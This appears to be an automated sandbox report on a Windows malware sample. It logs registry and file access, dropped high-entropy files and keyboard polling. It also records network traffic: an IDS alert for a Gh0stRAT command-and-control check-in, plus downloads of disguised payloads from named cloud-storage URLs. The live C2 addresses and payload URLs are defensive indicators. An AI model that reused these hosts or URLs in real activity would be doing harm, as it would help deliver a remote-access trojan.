Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB8A1B8 FindFirstFileExW,3_2_00007FF8BFB8A1B8
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A1C80 FindFirstFileA,FindFirstFileA,FindFirstFileA,FindClose,52_2_004A1C80
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A04A0 FindFirstFileA,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,52_2_004A04A0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00408EFE __EH_prolog,GetFileAttributesA,lstrcpy,FindFirstFileA,FindClose,52_2_00408EFE
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00408E80 __EH_prolog,FindFirstFileA,FindClose,52_2_00408E80
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00409040 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,52_2_00409040
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040935F __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,52_2_0040935F
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C5A33 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,52_2_004C5A33
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040E79C __EH_prolog,FindFirstFileA,FindClose,52_2_0040E79C
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004CA859 FindFirstFileA,FindClose,52_2_004CA859
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040E965 __EH_prolog,FindFirstFileA,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,52_2_0040E965
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004469AF __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,52_2_004469AF
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004D2C75 __EH_prolog,lstrcpy,FtpFindFirstFileA,52_2_004D2C75
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004472CA __EH_prolog,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,52_2_004472CA
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A73D0 lstrcpy,FindFirstFileA,GetLastError,SetLastError,52_2_004A73D0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00427512 __EH_prolog,FindFirstFileA,FindClose,52_2_00427512
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00425624 __EH_prolog,GetLogicalDriveStringsA,52_2_00425624
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]3_2_000000014000DFFE
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]3_2_000000014000DDFF
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]3_2_0000000140011270
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]3_2_000000014000DE96
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]3_2_000000014000DEFB
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]3_2_000000014000E178
Source: C:\Users\user\Documents\9afrYB.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]3_2_000000014000DDD9

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.5:49991 -> 8.217.59.222:8917
Source: global trafficTCP traffic: 192.168.2.5:49991 -> 8.217.59.222:8917
Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.222
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0041C471 __EH_prolog,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GlobalFree,GlobalFree,GlobalFree,FreeLibrary,URLDownloadToFileA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,52_2_0041C471
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: tjgohh.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /extra-task2.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dsb-hr2.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dsb-hr3.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dsb-hr1.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: tjgohh.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: ufozdv.net
Source: global trafficDNS traffic detected: DNS query: upitem.oss-cn-hangzhou.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 189atohci.sys.0.dr, 9afrYB.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: 189atohci.sys.0.dr, 9afrYB.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 9afrYB.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 9afrYB.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 9afrYB.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 9afrYB.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 9afrYB.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 9afrYB.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: 9afrYB.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 9afrYB.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 9afrYB.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 9afrYB.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 9afrYB.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 9afrYB.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 9afrYB.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, 9afrYB.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 9afrYB.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, 9afrYB.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, 9afrYB.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 9afrYB.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 9eYJWFQF.exe, 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf60buy
Source: 9afrYB.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 9afrYB.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 9afrYB.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: 9afrYB.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 9afrYB.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: 9afrYB.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gif7
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifJ
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifQ
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/a.gifhttps://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gif7
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifj
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/b.gifx
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2873466535874-68348745.02.exe, 00000000.00000003.2215762324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 2873466535874-68348745.02.exe, 00000000.00000003.2191752178.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tjgohh.oss-cn-beijing.aliyuncs.com/d.gif
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: 9eYJWFQF.exe.39.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60499
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60503 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60503
Source: unknownNetwork traffic detected: HTTP traffic on port 60499 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60502
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60501
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60500
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 60502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 60501 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownHTTPS traffic detected: 39.103.20.42:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.5:60499 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.5:60503 version: TLS 1.2
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00402C94 GetAsyncKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,52_2_00402C94
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C8744 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,52_2_004C8744
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004D188E GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,52_2_004D188E
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004D18A3 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,52_2_004D18A3
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004CAEAD GetKeyState,GetKeyState,GetKeyState,GetKeyState,52_2_004CAEAD

Spam, unwanted Advertisements and Ransom Demands

barindex
Writes many files with high entropy
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].gif entropy: 7.9954955896Jump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\Documents\MsMpList.dat entropy: 7.99993875906Jump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\a[1].gif entropy: 7.99530439254Jump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\b[1].gif entropy: 7.99352271294Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FOM-52[1].jpg entropy: 7.99951889252Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\5phaM8\log.src entropy: 7.99995522985Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\5phaM8\utils.vcxproj entropy: 7.99939950477Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\drops[1].jpg entropy: 7.99178106276Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\FOM-50[1].jpg entropy: 7.99273647747Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FOM-51[1].jpg entropy: 7.99995626102Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\bmaosk\tbcore3U.dll entropy: 7.99251713054Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\FOM-52[1].jpg entropy: 7.99951889252Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\bmaosk\log.src entropy: 7.99995522563Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\bmaosk\utils.vcxproj entropy: 7.9993994006Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\drops[1].jpg entropy: 7.99178106276Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FOM-50[1].jpg entropy: 7.99273647747Jump to dropped file
